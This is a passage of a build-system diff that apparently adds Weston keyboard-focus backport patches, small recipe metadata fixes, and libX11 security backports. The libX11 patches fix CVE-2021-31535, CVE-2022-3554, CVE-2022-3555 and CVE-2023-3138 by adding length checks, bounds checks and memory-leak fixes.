+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 3791be25..c4669f11 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
+ }
+ 
+ static void
+-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_deactivate(struct shell_surface *shsurf)
+ {
+ 	if (--shsurf->focus_count == 0)
+ 		weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
+ }
+ 
+ static void
+-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_activate(struct shell_surface *shsurf)
+ {
+ 	if (shsurf->focus_count++ == 0)
+ 		weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
+@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ 	if (seat->focused_surface) {
+ 		struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ 		if (shsurf)
+-			shell_surface_lose_keyboard_focus(shsurf);
++			shell_surface_deactivate(shsurf);
+ 	}
+ 
+ 	seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ 	if (seat->focused_surface) {
+ 		struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ 		if (shsurf)
+-			shell_surface_gain_keyboard_focus(shsurf);
++			shell_surface_activate(shsurf);
+ 	}
+ }
+ 
+-- 
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
+From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:44:26 +0200
+Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
+ activating
+
+We shouldn't be constrained by having a keyboard plugged-in, so avoid
+activating/de-activating the window/surface in the keyboard focus
+handler and embed it straight into the window activation part.
+
+Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
+ 1 file changed, 25 insertions(+), 16 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index c4669f11..c6a4fe91 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
+ static void
+ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ {
+-	struct weston_keyboard *keyboard = data;
+-	struct shell_seat *seat = get_shell_seat(keyboard->seat);
+-
+-	if (seat->focused_surface) {
+-		struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+-		if (shsurf)
+-			shell_surface_deactivate(shsurf);
+-	}
+-
+-	seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+-
+-	if (seat->focused_surface) {
+-		struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+-		if (shsurf)
+-			shell_surface_activate(shsurf);
+-	}
++	/* FIXME: To be removed later. */
+ }
+ 
+ /* The surface will be inserted into the list immediately after the link
+@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ 	struct shell_surface *shsurf_child, *tmp;
+ 	struct weston_surface *surface =
+ 		weston_desktop_surface_get_surface(desktop_surface);
++	struct weston_seat *seat;
+ 
+ 	if (!shsurf)
+ 		return;
+@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ 	}
+ 	wl_list_remove(&shsurf->children_link);
+ 
++	wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
++		struct shell_seat *shseat = get_shell_seat(seat);
++		/* activate() controls the focused surface activation and
++		 * removal of a surface requires invalidating the
++		 * focused_surface to avoid activate() use a stale (and just
++		 * removed) surface when attempting to de-activate it. It will
++		 * also update the focused_surface once it has a chance to run.
++		 */
++		if (surface == shseat->focused_surface)
++			shseat->focused_surface = NULL;
++	}
++
+ 	wl_signal_emit(&shsurf->destroy_signal, shsurf);
+ 
+ 	if (shsurf->fullscreen.black_view)
+@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+ 	struct workspace *ws;
+ 	struct weston_surface *old_es;
+ 	struct shell_surface *shsurf, *shsurf_child;
++	struct shell_seat *shseat = get_shell_seat(seat);
+ 
+ 	main_surface = weston_surface_get_main_surface(es);
+ 	shsurf = get_shell_surface(main_surface);
+@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+ 
+ 	weston_view_activate(view, seat, flags);
+ 
++	if (shseat->focused_surface) {
++		struct shell_surface *current_focus =
++			get_shell_surface(shseat->focused_surface);
++		assert(current_focus);
++		shell_surface_deactivate(current_focus);
++	}
++
++	shseat->focused_surface = main_surface;
++	shell_surface_activate(shsurf);
++
+ 	state = ensure_focus_state(shell, seat);
+ 	if (state == NULL)
+ 		return;
+-- 
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston_8.0.0.bb b/meta/recipes-graphics/wayland/weston_8.0.0.bb
index 8fef864827..5e4e2032c9 100644
--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
            file://weston.desktop \
            file://xwayland.weston-start \
            file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
+           file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
+           file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
+           file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
 "
 SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
 SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"
@@ -70,7 +73,7 @@ PACKAGECONFIG[colord] = "-Dcolor-management-colord=true,-Dcolor-management-color
 # Clients support
 PACKAGECONFIG[clients] = "-Dsimple-clients=all -Ddemo-clients=true,-Dsimple-clients= -Ddemo-clients=false"
 # Virtual remote output with GStreamer on DRM backend
-PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer-1.0"
+PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer1.0"
 # Weston with PAM support
 PACKAGECONFIG[pam] = "-Dpam=true,-Dpam=false,libpam"
 # Weston with screen-share support
diff --git a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
index 65348c3762..baaf8fa9ad 100644
--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Touchscreen calibration data from xinput-calibrator"
+DESCRIPTION = "A generic touchscreen calibration program for X.Org"
+HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
+BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
 
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe..e524b82dd6 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
 REQUIRED_DISTRO_FEATURES = "x11"
 
 SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
            file://30xinput_calibrate.sh \
            file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
            file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 553840ddb8..685362ef15 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
 PV = "2.99.917+git${SRCPV}"
 S = "${WORKDIR}/git"
 
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel"
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
 
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
 
diff --git a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
index 1ea08a6c99..6a91582068 100644
--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -10,8 +10,10 @@ LIC_FILES_CHKSUM = "file://../misc/fonts.dir;md5=82a143d94d6a974aafe97132d2d519a
 
 SRC_URI = "file://misc"
 
+SOURCE_DATE_EPOCH = "1613559011"
+
 PE = "1"
-PR = "r2"
+PR = "r3"
 
 inherit allarch features_check
 
@@ -27,6 +29,8 @@ RDEPENDS_${PN} += "font-alias"
 do_install() {
 	install -d ${D}/${datadir}/fonts/X11/misc
 	install -m 0644 ${S}/* ${D}/${datadir}/fonts/X11/misc/
+	# Pick a date/time as otherwise it would be the git checkout/modify time
+	touch -d @1613559011 ${D}/${datadir}/fonts/X11/misc/*
 	install -d ${D}/${libdir}/X11
 	ln -sf ${datadir}/fonts/X11/ ${D}/${libdir}/X11/fonts -s
 }
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
+From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
+From: Matthieu Herrb <matthieu@herrb.eu>
+Date: Fri, 19 Feb 2021 15:30:39 +0100
+Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
+ the wire
+
+The X protocol uses CARD16 values to represent the length so
+this would overflow.
+
+CVE-2021-31535
+
+Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
+
+https://lists.x.org/archives/xorg-announce/2021-May/003088.html
+
+XLookupColor() and other X libraries function lack proper validation
+of the length of their string parameters. If those parameters can be
+controlled by an external application (for instance a color name that
+can be emitted via a terminal control sequence) it can lead to the
+emission of extra X protocol requests to the X server.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
+CVE: CVE-2021-31535
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ src/Font.c      | 6 ++++--
+ src/FontInfo.c  | 3 +++
+ src/FontNames.c | 3 +++
+ src/GetColor.c  | 4 ++++
+ src/LoadFont.c  | 4 ++++
+ src/LookupCol.c | 6 ++++--
+ src/ParseCol.c  | 5 ++++-
+ src/QuExt.c     | 5 +++++
+ src/SetFPath.c  | 8 +++++++-
+ src/SetHints.c  | 7 +++++++
+ src/StNColor.c  | 3 +++
+ src/StName.c    | 7 ++++++-
+ 12 files changed, 54 insertions(+), 7 deletions(-)
+
+diff --git a/src/Font.c b/src/Font.c
+index 09d2ae91..3f468e4b 100644
+--- a/src/Font.c
++++ b/src/Font.c
+@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
+     XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
+ #endif
+ 
++    if (strlen(name) >= USHRT_MAX)
++        return NULL;
+     if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
+       return font_result;
+     LockDisplay(dpy);
+@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
+ 
+     if (!name)
+ 	return 0;
+-    l = strlen(name);
+-    if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
++    l = (int) strlen(name);
++    if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
+ 	return 0;
+     charset = NULL;
+     /* next three lines stolen from _XkbGetCharset() */
+diff --git a/src/FontInfo.c b/src/FontInfo.c
+index f870e431..51b48e29 100644
+--- a/src/FontInfo.c
++++ b/src/FontInfo.c
+@@ -58,6 +58,9 @@ XFontStruct **info)	/* RETURN */
+     register xListFontsReq *req;
+     int j;
+ 
++    if (strlen(pattern) >= USHRT_MAX)
++        return NULL;
++
+     LockDisplay(dpy);
+     GetReq(ListFontsWithInfo, req);
+     req->maxNames = maxNames;
+diff --git a/src/FontNames.c b/src/FontNames.c
+index b78792d6..4dac4916 100644
+--- a/src/FontNames.c
++++ b/src/FontNames.c
+@@ -51,6 +51,9 @@ int *actualCount)	/* RETURN */
+     register xListFontsReq *req;
+     unsigned long rlen = 0;
+ 
++    if (strlen(pattern) >= USHRT_MAX)
++        return NULL;
++
+     LockDisplay(dpy);
+     GetReq(ListFonts, req);
+     req->maxNames = maxNames;
+diff --git a/src/GetColor.c b/src/GetColor.c
+index cd0eb9f6..512ac308 100644
+--- a/src/GetColor.c
++++ b/src/GetColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
+     XcmsColor cmsColor_exact;
+     Status ret;
+ 
++    if (strlen(colorname) >= USHRT_MAX)
++        return (0);
++
+ #ifdef XCMS
+     /*
+      * Let's Attempt to use Xcms and i18n approach to Parse Color
+diff --git a/src/LoadFont.c b/src/LoadFont.c
+index f547976b..85735249 100644
+--- a/src/LoadFont.c
++++ b/src/LoadFont.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include "Xlibint.h"
+ 
+ Font
+@@ -38,6 +39,9 @@ XLoadFont (
+     Font fid;
+     register xOpenFontReq *req;
+ 
++    if (strlen(name) >= USHRT_MAX)
++        return (0);
++
+     if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
+       return fid;
+ 
+diff --git a/src/LookupCol.c b/src/LookupCol.c
+index f7f969f5..cd9b1368 100644
+--- a/src/LookupCol.c
++++ b/src/LookupCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,9 @@ XLookupColor (
+ 	XcmsCCC ccc;
+ 	XcmsColor cmsColor_exact;
+ 
++	n = (int) strlen (spec);
++	if (n >= USHRT_MAX)
++            return 0;
+ #ifdef XCMS
+ 	/*
+ 	 * Let's Attempt to use Xcms and i18n approach to Parse Color
+@@ -77,8 +81,6 @@ XLookupColor (
+ 	 * Xcms and i18n methods failed, so lets pass it to the server
+ 	 * for parsing.
+ 	 */
+-
+-	n = strlen (spec);
+ 	LockDisplay(dpy);
+ 	GetReq (LookupColor, req);
+ 	req->cmap = cmap;
+diff --git a/src/ParseCol.c b/src/ParseCol.c
+index e997b1b8..180132dd 100644
+--- a/src/ParseCol.c
++++ b/src/ParseCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,7 +47,9 @@ XParseColor (
+ 	XcmsColor cmsColor;
+ 
+         if (!spec) return(0);
+-	n = strlen (spec);
++	n = (int) strlen (spec);
++	if (n >= USHRT_MAX)
++            return(0);
+ 	if (*spec == '#') {
+ 	    /*
+ 	     * RGB
+diff --git a/src/QuExt.c b/src/QuExt.c
+index 4e230e77..d38a1572 100644
+--- a/src/QuExt.c
++++ b/src/QuExt.c
+@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
++#include <stdbool.h>
+ #include "Xlibint.h"
+ 
+ Bool
+@@ -40,6 +42,9 @@ XQueryExtension(
+     xQueryExtensionReply rep;
+     register xQueryExtensionReq *req;
+ 
++    if (strlen(name) >= USHRT_MAX)
++        return false;
++
+     LockDisplay(dpy);
+     GetReq(QueryExtension, req);
+     req->nbytes = name ? strlen(name) : 0;
+diff --git a/src/SetFPath.c b/src/SetFPath.c
+index 60aaef01..3d8c50cb 100644
+--- a/src/SetFPath.c
++++ b/src/SetFPath.c
+@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
+ 
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
++#include <limits.h>
+ #endif
+ #include "Xlibint.h"
+ 
+@@ -48,7 +49,12 @@ XSetFontPath (
+ 	GetReq (SetFontPath, req);
+ 	req->nFonts = ndirs;
+ 	for (i = 0; i < ndirs; i++) {
+-		n += safestrlen (directories[i]) + 1;
++		n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
++		if (n >= USHRT_MAX) {
++			UnlockDisplay(dpy);
++			SyncHandle();
++			return 0;
++		}
+ 	}
+ 	nbytes = (n + 3) & ~3;
+ 	req->length += nbytes >> 2;
+diff --git a/src/SetHints.c b/src/SetHints.c
+index bc46498a..f3d727ec 100644
+--- a/src/SetHints.c
++++ b/src/SetHints.c
+@@ -49,6 +49,7 @@ SOFTWARE.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include "Xatomtype.h"
+@@ -214,6 +215,8 @@ XSetCommand (
+ 	register char *buf, *bp;
+ 	for (i = 0, nbytes = 0; i < argc; i++) {
+ 		nbytes += safestrlen(argv[i]) + 1;
++		if (nbytes >= USHRT_MAX)
++                    return 1;
+ 	}
+ 	if ((bp = buf = Xmalloc(nbytes))) {
+ 	    /* copy arguments into single buffer */
+@@ -256,6 +259,8 @@ XSetStandardProperties (
+ 
+ 	if (name != NULL) XStoreName (dpy, w, name);
+ 
++        if (safestrlen(icon_string) >= USHRT_MAX)
++            return 1;
+ 	if (icon_string != NULL) {
+ 	    XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+                              PropModeReplace,
+@@ -298,6 +303,8 @@ XSetClassHint(
+ 
+ 	len_nm = safestrlen(classhint->res_name);
+ 	len_cl = safestrlen(classhint->res_class);
++        if (len_nm + len_cl >= USHRT_MAX)
++            return 1;
+ 	if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
+ 	    if (len_nm) {
+ 		strcpy(s, classhint->res_name);
+diff --git a/src/StNColor.c b/src/StNColor.c
+index 8b821c3e..ba021958 100644
+--- a/src/StNColor.c
++++ b/src/StNColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,8 @@ int flags)  /* DoRed, DoGreen, DoBlue */
+     XcmsColor cmsColor_exact;
+     XColor scr_def;
+ 
++    if (strlen(name) >= USHRT_MAX)
++        return 0;
+ #ifdef XCMS
+     /*
+      * Let's Attempt to use Xcms approach to Parse Color
+diff --git a/src/StName.c b/src/StName.c
+index b4048bff..5a632d0c 100644
+--- a/src/StName.c
++++ b/src/StName.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xatom.h>
+ 
+@@ -36,7 +37,9 @@ XStoreName (
+     Window w,
+     _Xconst char *name)
+ {
+-    return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
++    if (strlen(name) >= USHRT_MAX)
++        return 0;
++    return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /*  */
+ 			   8, PropModeReplace, (_Xconst unsigned char *)name,
+ 			   name ? strlen(name) : 0);
+ }
+@@ -47,6 +50,8 @@ XSetIconName (
+     Window w,
+     _Xconst char *icon_name)
+ {
++    if (strlen(icon_name) >= USHRT_MAX)
++        return 0;
+     return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+                            PropModeReplace, (_Xconst unsigned char *)icon_name,
+ 			   icon_name ? strlen(icon_name) : 0);
+-- 
+2.32.0
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
+From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 2 Nov 2022 17:04:15 +0530
+Subject: [PATCH] CVE-2022-3554
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
+CVE: CVE-2022-3554
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+fix a memory leak in XRegisterIMInstantiateCallback
+
+Analysis:
+
+    _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
+    the internal function pointers, but the internal close function does
+    not free the pointer to the XIM (this would be done in XCloseIM()).
+
+Report/patch:
+
+    Date: Mon, 03 Oct 2022 18:47:32 +0800
+    From: Po Lu <luangruo@yahoo.com>
+    To: xorg-devel@lists.x.org
+    Subject: Re: Yet another leak in Xlib
+
+    For reference, here's how I'm calling XRegisterIMInstantiateCallback:
+
+    XSetLocaleModifiers ("");
+    XRegisterIMInstantiateCallback (compositor.display,
+                                    XrmGetDatabase (compositor.display),
+                                    (char *) compositor.resource_name,
+                                    (char *) compositor.app_name,
+                                    IMInstantiateCallback, NULL);
+    and XMODIFIERS is:
+
+        @im=ibus
+
+Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>
+---
+ modules/im/ximcp/imInsClbk.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
+index 961aaba..0a8a874 100644
+--- a/modules/im/ximcp/imInsClbk.c
++++ b/modules/im/ximcp/imInsClbk.c
+@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
+     if( xim ) {
+ 	lock = True;
+ 	xim->methods->close( (XIM)xim );
++	/* XIMs must be freed manually after being opened; close just
++	   does the protocol to deinitialize the IM.  */
++	XFree( xim );
+ 	lock = False;
+ 	icb->call = True;
+ 	callback( display, client_data, NULL );
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
+From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
+From: Hodong <hodong@yozmos.com>
+Date: Thu, 20 Jan 2022 00:57:41 +0900
+Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
+
+Even when XCloseDisplay() was called, some memory was leaked.
+
+XCloseDisplay() calls _XFreeDisplayStructure(), which calls
+_XFreeX11XCBStructure().
+
+However, _XFreeX11XCBStructure() did not destroy the condition variables,
+resulting in the leaking of some 40 bytes.
+
+Signed-off-by: Hodong <hodong@yozmos.com>
+
+Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
+CVE:CVE-2022-3555
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/xcb_disp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/xcb_disp.c b/src/xcb_disp.c
+index 70a602f4..e9becee3 100644
+--- a/src/xcb_disp.c
++++ b/src/xcb_disp.c
+@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
+ 		dpy->xcb->pending_requests = tmp->next;
+ 		free(tmp);
+ 	}
++	xcondition_clear(dpy->xcb->event_notify);
++	xcondition_clear(dpy->xcb->reply_notify);
+ 	xcondition_free(dpy->xcb->event_notify);
+ 	xcondition_free(dpy->xcb->reply_notify);
+ 	Xfree(dpy->xcb);
+-- 
+2.18.2
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
new file mode 100644
index 0000000000..c724cf8fdd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
+From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sat, 10 Jun 2023 16:30:07 -0700
+Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
+ error codes
+
+Fixes CVE-2023-3138: X servers could return values from XQueryExtension
+that would cause Xlib to write entries out-of-bounds of the arrays to
+store them, though this would only overwrite other parts of the Display
+struct, not outside the bounds allocated for that structure.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+CVE: CVE-2023-3138
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
+Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
+---
+ src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 42 insertions(+)
+
+diff --git a/src/InitExt.c b/src/InitExt.c
+index 4de46f15..afc00a6b 100644
+--- a/src/InitExt.c
++++ b/src/InitExt.c
+@@ -33,6 +33,18 @@ from The Open Group.
+ #include <X11/Xos.h>
+ #include <stdio.h>
+ 
++/* The X11 protocol spec reserves events 64 through 127 for extensions */
++#ifndef LastExtensionEvent
++#define LastExtensionEvent 127
++#endif
++
++/* The X11 protocol spec reserves requests 128 through 255 for extensions */
++#ifndef LastExtensionRequest
++#define FirstExtensionRequest 128
++#define LastExtensionRequest 255
++#endif
++
++
+ /*
+  * This routine is used to link a extension in so it will be called
+  * at appropriate times.
+@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
+ 	WireToEventType proc)	/* routine to call when converting event */
+ {
+ 	register WireToEventType oldproc;
++	if (event_number < 0 ||
++	    event_number > LastExtensionEvent) {
++	    fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++		    event_number);
++	    return (WireToEventType)_XUnknownWireEvent;
++	}
+ 	if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
+ 	LockDisplay (dpy);
+ 	oldproc = dpy->event_vec[event_number];
+@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
+     )
+ {
+ 	WireToEventCookieType oldproc;
++	if (extension < FirstExtensionRequest ||
++	    extension > LastExtensionRequest) {
++	    fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++		    extension);
++	    return (WireToEventCookieType)_XUnknownWireEventCookie;
++	}
+ 	if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
+ 	LockDisplay (dpy);
+ 	oldproc = dpy->generic_event_vec[extension & 0x7F];
+@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
+     )
+ {
+ 	CopyEventCookieType oldproc;
++	if (extension < FirstExtensionRequest ||
++	    extension > LastExtensionRequest) {
++	    fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++		    extension);
++	    return (CopyEventCookieType)_XUnknownCopyEventCookie;
++	}
+ 	if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
+ 	LockDisplay (dpy);
+ 	oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
